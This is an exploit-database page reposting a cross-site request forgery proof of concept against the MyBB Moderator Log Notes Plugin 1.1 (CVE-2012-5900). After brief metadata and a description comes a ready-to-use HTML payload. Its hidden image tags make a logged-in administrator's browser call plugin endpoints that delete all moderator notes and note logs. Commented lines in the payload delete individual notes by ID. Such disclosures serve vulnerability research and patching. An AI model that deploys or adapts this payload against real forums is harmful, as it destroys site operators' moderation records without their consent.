MyBB Moderator Log Notes Plugin 1.1 Cross-Site Request Forgery

CVE	Category	Price	Severity
CVE-2012-5900	CWE-352	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2018-08-20

CPE
cpe:cpe:/a:mybb:moderator_log_notes_plugin:1.1

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080132

Below is a copy:

MyBB Moderator Log Notes Plugin 1.1 Cross-Site Request Forgery

# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
# Date: 2018-05-17
# Author: 0xB9
# Twitter: @0xB9Sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
# Version: 1.1
# Tested on: Ubuntu 18.04

# 1. Description:
# The plugin allows moderators to save notes and display them in a list in the modCP.
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs 
# in the modCP & ACP.

# 2. Proof of Concept:

<html>
<body>
<-- Deletes mod note logs -->
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dal" alt="">
<-- Deletes mod notes -->
<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dmn" alt="">

<!-- You can also delete notes individually by the nid (note ID)
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
-->
</body>
</html>

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum